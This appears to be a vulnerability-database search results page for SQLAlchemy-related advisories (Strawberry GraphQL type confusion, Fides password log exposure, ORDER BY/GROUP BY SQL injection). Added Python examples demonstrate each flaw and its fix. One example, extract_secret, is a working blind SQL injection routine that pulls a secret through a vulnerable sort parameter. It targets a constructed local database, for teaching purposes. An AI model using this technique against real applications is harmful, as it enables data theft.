270 matches found
GHSA-5XH2-23CC-5JC6 Strawberry GraphQL has type resolution vulnerability in node interface that allows potential data leakage through incorrect type resolution
Vulnerability Summary A type confusion vulnerability exists in Strawberry GraphQL's relay integration that affects multiple ORM integrations (Django, SQLAlchemy, Pydantic). The vulnerability occurs when multiple GraphQL types are mapped to the same underlying model while using the relay node...
Insufficient Type Distinction
Overview strawberry-graphql is a library for creating GraphQL APIs. Affected versions of this package are vulnerable to Insufficient Type Distinction in the relay integration, which affects multiple ORM integrations (Django, SQLAlchemy, Pydantic). An attacker can access unauthorized data by queryin...
PT-2025-4385 · Unknown +2 · Sqlalchemy +3
Name of the Vulnerable Software and Affected Versions: Strawberry GraphQL versions 0.182.0 through 0.257.0 Description: A type confusion vulnerability exists in Strawberry GraphQL's relay integration, affecting multiple ORM integrations, including Django, SQLAlchemy, and Pydantic. This issue occu...
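The entries above describe the failure mode (two GraphQL types over one model, resolved through the relay node interface) without showing it. The following is an added illustration, not Strawberry's code and not the advisory's reproduction: a minimal relay-style `node(id:)` resolver with a constructed `User` model, a `PublicUser` type and a `StaffUser` type on that same model. In the vulnerable shape the type registry is keyed by model, so the second type silently replaces the first and a `PublicUser` global ID is answered with `StaffUser` fields. The fixed shape keys the registry by the type name carried in the global ID. All names, the base64 `Type:id` encoding and the sample row are assumptions for the example.

```python
import base64
from dataclasses import dataclass


# Constructed stand-in for an ORM model. Two GraphQL types below expose
# different subsets of it: the "multiple types mapped to one model" case.
@dataclass
class User:
    id: int
    name: str
    email: str
    is_staff: bool


ROWS = {1: User(1, "alice", "alice@example.org", True)}  # constructed sample data


@dataclass(frozen=True)
class GraphQLType:
    name: str
    model: type
    fields: tuple


PublicUser = GraphQLType("PublicUser", User, ("id", "name"))
StaffUser = GraphQLType("StaffUser", User, ("id", "name", "email", "is_staff"))


def to_global_id(type_name: str, obj_id: int) -> str:
    """Relay-style opaque ID: base64 of 'TypeName:id' (assumed encoding)."""
    return base64.b64encode(f"{type_name}:{obj_id}".encode()).decode()


def from_global_id(gid: str) -> tuple[str, int]:
    type_name, _, obj_id = base64.b64decode(gid).decode().partition(":")
    return type_name, int(obj_id)


def project(gql_type: GraphQLType, row: User) -> dict:
    """Serialise only the fields the GraphQL type declares."""
    out = {"__typename": gql_type.name}
    out.update({f: getattr(row, f) for f in gql_type.fields})
    return out


# --- Vulnerable shape: registry keyed by model. Registering StaffUser after
# PublicUser overwrites the entry, so every node lookup for a User row is
# answered with the StaffUser projection, whatever type the ID named.
BY_MODEL: dict[type, GraphQLType] = {}
for t in (PublicUser, StaffUser):
    BY_MODEL[t.model] = t

TYPE_TO_MODEL = {t.name: t.model for t in (PublicUser, StaffUser)}


def resolve_node_vulnerable(gid: str) -> dict:
    type_name, obj_id = from_global_id(gid)
    model = TYPE_TO_MODEL[type_name]      # PublicUser -> User ...
    row = ROWS[obj_id]
    return project(BY_MODEL[model], row)  # ... but User -> StaffUser: email leaks


# --- Fixed shape: resolve by the type named in the ID, and refuse IDs that
# name a type the registry does not know or a row of another model.
BY_NAME: dict[str, GraphQLType] = {t.name: t for t in (PublicUser, StaffUser)}


def resolve_node_fixed(gid: str) -> dict:
    type_name, obj_id = from_global_id(gid)
    gql_type = BY_NAME.get(type_name)
    if gql_type is None:
        raise LookupError(f"unknown node type {type_name!r}")
    row = ROWS.get(obj_id)
    if row is None or not isinstance(row, gql_type.model):
        raise LookupError("node not found")
    return project(gql_type, row)


if __name__ == "__main__":
    gid = to_global_id("PublicUser", 1)
    print(resolve_node_vulnerable(gid))  # carries email and is_staff
    print(resolve_node_fixed(gid))       # id and name only
```

The check that matters when auditing a real schema is the second one: whether the node resolver chooses the concrete type from the global ID or from the model it finds, because only the former keeps the per-type field exposure intact when several types share a model.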
RHSA-2012:0369 Red Hat Security Advisory: python-sqlalchemy security update
Bulletin has no description...
OPENSUSE-SU-2024:11211-1 python-SQLAlchemy-doc-1.4.22-1.2 on GA media
These are all security issues fixed in the python-SQLAlchemy-doc-1.4.22-1.2 package on the GA media of openSUSE Tumbleweed...
RHEL 7 : python-sqlalchemy (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 7 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - python-sqlalchemy: SQL Injection when the groupby parameter can be controlled CVE-2019-7548 Note that Nessus has no...
RHEL 6 : calamari-server (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 6 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - python-sqlalchemy: SQL Injection when the orderby parameter can be controlled CVE-2019-7164 Note that Nessus has no...
RHEL 6 : python-sqlalchemy (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 6 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - python-sqlalchemy: SQL Injection when the groupby parameter can be controlled CVE-2019-7548 Note that Nessus has no...
Partial Password Leakage
ethyca-fides is vulnerable to Partial Password Leakage. The vulnerability is due to improper sanitization/redaction of the SQLAlchemy password string in error logs, which partially exposes the database password when special characters are used inside the password...
CVE-2024-34715
Fides is an open-source privacy engineering platform. The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as @ and $, webserver...
CVE-2024-34715 Partial Password Exposure Vulnerability in Fides Webserver Logs
Fides is an open-source privacy engineering platform. The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as @ and $, webserver...
CVE-2024-34715
CVE-2024-34715 affects the Fides webserver, where an improper escaping of the SQLAlchemy password string can cause the database password to be partially exposed in webserver logs when the password contains characters like @ or $. This is due to insufficient escaping of the password in the connect...
GHSA-8CM5-JFJ2-26Q7 Fides Webserver Logs Hosted Database Password Partial Exposure Vulnerability
The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as @ and $, webserver startup fails and the part of the password following the...
PT-2024-26129 · Unknown +1 · Sqlalchemy +2
Name of the Vulnerable Software and Affected Versions: Fides versions prior to 2.37.0 Description: The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes...
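The Fides entries above all turn on one parsing detail: in a database URL the password component ends at the first `@`, so an unescaped password containing `@` is cut there and its tail is read as the host name, which a failed connection then prints in the error log. The following is an added illustration, not Fides' or SQLAlchemy's code: a simplified URL grammar (an assumption, written to share that one property), the mis-parse it produces, the percent-encoding fix, and a redaction helper for anything that is logged. The secret, host and error text are constructed.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Simplified database-URL grammar, assumed for illustration. The property that
# matters is the password group: it stops at the first '@'.
_URL_RE = re.compile(
    r"""^(?P<driver>[\w+]+)://
        (?:(?P<username>[^:/]*)(?::(?P<password>[^@]*))?@)?
        (?P<host>[^/:?]*)(?::(?P<port>\d+))?
        (?:/(?P<database>[^?]*))?$""",
    re.VERBOSE,
)


def parse_url(url: str) -> dict:
    """Split a database URL into components; the password is left as written."""
    m = _URL_RE.match(url)
    if m is None:
        raise ValueError("not a database URL")
    return m.groupdict()


def build_url(driver: str, username: str, password: str, host: str, port: int, database: str) -> str:
    """Build a URL whose credentials survive any characters by percent-encoding them."""
    return f"{driver}://{quote_plus(username)}:{quote_plus(password)}@{host}:{port}/{database}"


def effective_password(url: str) -> str:
    """The password a driver would use after decoding the component."""
    return unquote_plus(parse_url(url)["password"] or "")


def redact(url: str) -> str:
    """Form of the URL that is safe to write to logs: password replaced."""
    m = _URL_RE.match(url)
    if m is None or m.group("password") is None:
        return url
    start, end = m.span("password")
    return url[:start] + "***" + url[end:]


def startup_error_line(url: str) -> str:
    """Constructed stand-in for the libpq-style message a failed connect logs."""
    host = parse_url(url)["host"]
    return f'could not translate host name "{host}" to address: Name or service not known'


PASSWORD = "p@ss$word"  # constructed example secret

# Unescaped: the password is cut at its first '@' and the remainder becomes
# the host name, so the error log carries part of the secret.
RAW = f"postgresql://fides:{PASSWORD}@db.internal:5432/fides"

# Escaped: the same secret, percent-encoded, parses and decodes correctly.
SAFE = build_url("postgresql", "fides", PASSWORD, "db.internal", 5432, "fides")

if __name__ == "__main__":
    print(parse_url(RAW)["host"])     # ss$word@db.internal
    print(startup_error_line(RAW))    # exposes 'ss$word'
    print(effective_password(SAFE))   # p@ss$word
    print(redact(SAFE))               # postgresql://fides:***@db.internal:5432/fides
```

Two practical checks follow from this: build connection URLs from components with the password percent-encoded (or with the library's own URL constructor) rather than by string concatenation, and never log the URL string that was actually handed to the driver; log a redacted form.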
Huawei EulerOS: Security Advisory for python-mako (EulerOS-SA-2024-1701)
The remote host is missing an update for the Huawei EulerOS python-mako package (advisory text by Greenbone AG, 2024; some descriptions are excerpted from referenced sources and are copyright of the respective right holders)...
EulerOS Virtualization 3.0.6.0 : python-mako (EulerOS-SA-2024-1701)
According to the versions of the python-mako packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Sqlalchemy mako before 1.2.2 is vulnerable to Regular expression Denial of Service when using the Lexer class to parse. This...
RHEL 7 : python-sqlalchemy (Unpatched Vulnerability)
The remote Redhat Enterprise Linux 7 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - python-sqlalchemy: SQL Injection when the orderby parameter can be controlled CVE-2019-7164 - SQLAlchemy...
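CVE-2019-7164 and CVE-2019-7548, listed in the RHEL entries above and earlier on this page, are both instances of one pattern: a caller-controlled string reaching `ORDER BY` or `GROUP BY` as raw SQL. The following added example is not SQLAlchemy's code and does not use it; it shows the pattern with the standard-library `sqlite3` module, including what an attacker gets from it (an ordering oracle that reads another table one character per query, with no error messages or unions needed) and the allowlist shape that closes it. Table names, rows and the secret are constructed.

```python
import sqlite3

# Allowlists: the only things a caller may choose are keys into these maps.
SORTABLE = {"id": "id", "name": "name", "created": "created_at"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, created_at TEXT);
        CREATE TABLE api_keys(id INTEGER PRIMARY KEY, secret TEXT);
        INSERT INTO users VALUES (1,'alice','2024-01-01'),(2,'bob','2024-02-01'),(3,'carol','2024-03-01');
        INSERT INTO api_keys VALUES (1,'sk_live_7f3a');
        """
    )
    return conn


def list_users_vulnerable(conn: sqlite3.Connection, order_by: str) -> list:
    """Caller-controlled string pasted into ORDER BY as SQL (the CVE pattern)."""
    return [r[0] for r in conn.execute(f"SELECT name FROM users ORDER BY {order_by}")]


def extract_secret(conn: sqlite3.Connection, max_len: int = 16) -> str:
    """Blind extraction through the vulnerable sort: ORDER BY a CASE expression
    that sorts ascending when a one-character guess is right and descending
    otherwise, so the first row returned leaks one bit per query."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789_"
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in alphabet:
            probe = (
                f"CASE WHEN (SELECT substr(secret,{pos},1) FROM api_keys WHERE id=1)='{ch}' "
                f"THEN id ELSE -id END"
            )
            if list_users_vulnerable(conn, probe)[0] == "alice":  # ascending id: alice first
                found = ch
                break
        if found is None:   # substr past the end returns '' and matches nothing
            break
        recovered += found
    return recovered


def list_users_fixed(conn: sqlite3.Connection, sort: str, direction: str = "asc") -> list:
    """Only allowlisted column names and directions ever reach the SQL text."""
    try:
        column, dirn = SORTABLE[sort], DIRECTIONS[direction.lower()]
    except KeyError:
        raise ValueError(f"unsupported sort {sort!r}/{direction!r}") from None
    return [r[0] for r in conn.execute(f"SELECT name FROM users ORDER BY {column} {dirn}")]


def is_rejected(conn: sqlite3.Connection, sort: str, direction: str = "asc") -> bool:
    """True when the fixed endpoint refuses the caller's sort specification."""
    try:
        list_users_fixed(conn, sort, direction)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(list_users_vulnerable(db, "id"))     # ['alice', 'bob', 'carol']
    print(extract_secret(db))                  # sk_live_7f3a
    print(list_users_fixed(db, "created", "desc"))
    print(is_rejected(db, "id; --"))           # True
```

The same allowlist discipline applies with an ORM: map the caller's sort key to a column object (SQLAlchemy 1.3 and later raise on strings in `order_by`/`group_by` that are not plain label references, which is the fix these CVEs refer to), and treat the direction as a separate enumerated choice rather than part of the string.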